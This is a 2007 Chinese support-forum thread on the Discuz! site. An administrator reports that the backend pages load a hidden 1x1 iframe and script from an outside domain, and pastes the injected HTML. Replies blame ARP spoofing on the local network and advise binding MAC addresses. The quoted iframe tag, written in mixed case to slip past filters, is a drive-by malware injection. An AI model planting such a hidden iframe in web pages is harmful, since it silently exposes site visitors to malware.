Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索

恐怖 有人中这个木马吗?

[复制链接]
老7 发表于 2007-1-17 15:39:31 | 显示全部楼层 |阅读模式
从昨天开始~SS后台操作发现木马~~~!!!!
在操作过程中,状态栏显示:正在下载http://cool.47555.com/mm.js
查看源文件,则发现被放了代码<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe>

太恐怖了~~

从FTP上查看了ADMIN文件夹下的所有文件,又看不出被修改过的痕迹!!!!

怎么办啊?
完整的是这样:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<iFrAmE SRc=http://cool.47555.com/k.htm width=1 height=1 frameborder=0></IfRaMe><!--Administrator's Control Panel</title>
<link href="http://www.ABC.com/admin/images/style.css" rel="stylesheet" type="text/css" />
<link href="http://www.ABC.com/images/edit/edit.css" rel="stylesheet" type="text/css" />
网点 发表于 2007-1-17 15:42:14 | 显示全部楼层
TEAM组成员会尽快联系你的....
希望保留服务器日志
回复

使用道具 举报

 楼主| 老7 发表于 2007-1-17 15:56:20 | 显示全部楼层
补充说明 只在后台操作时候发现~`其他页面则没有~~


谢谢~~
另外,刚才搜索了一下~
有位朋友也中了
https://discuz.dismall.com/viewthread.php?tid=446662
回复

使用道具 举报

网点 发表于 2007-1-17 16:38:38 | 显示全部楼层
可以对照哪个帖排查一下.最好是能够联系服务器管理员 .
回复

使用道具 举报

mokfly 发表于 2007-1-18 12:18:51 | 显示全部楼层
您好,这是您内网有人中了病毒进行arp欺骗攻击.
我建议您联系你的机房管理员,绑顶MAC地址,否则是没有办法解决这样的问题.

当然,您有一些其他什么的问题或是对我的回答有其他看法,可以联系我..

回复

使用道具 举报

 楼主| 老7 发表于 2007-1-18 14:14:31 | 显示全部楼层
谢谢  我照你说的去看一下~~

另外 这个问题似乎是间歇性的 有时候出现  有时候没出现~
怪在这里~~
回复

使用道具 举报

网点 发表于 2007-1-18 14:25:07 | 显示全部楼层
你发个短消息给MOKFLY吧。。。。
详细再描述一下。
回复

使用道具 举报

mokfly 发表于 2007-1-19 11:20:55 | 显示全部楼层
这样的情况就不奇怪了...
:) 由于是内网的arp,所以间断的出现是很正常的,另外这病毒是寻找title标记然后修改的...
回复

使用道具 举报

免失志 发表于 2007-11-22 08:17:49 | 显示全部楼层
我的今天也中了,惨
回复

使用道具 举报

changlr01 发表于 2008-9-9 11:39:14 | 显示全部楼层
这样也能判断是ARP? F了
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2024-11-28 08:28 , Processed in 0.032099 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表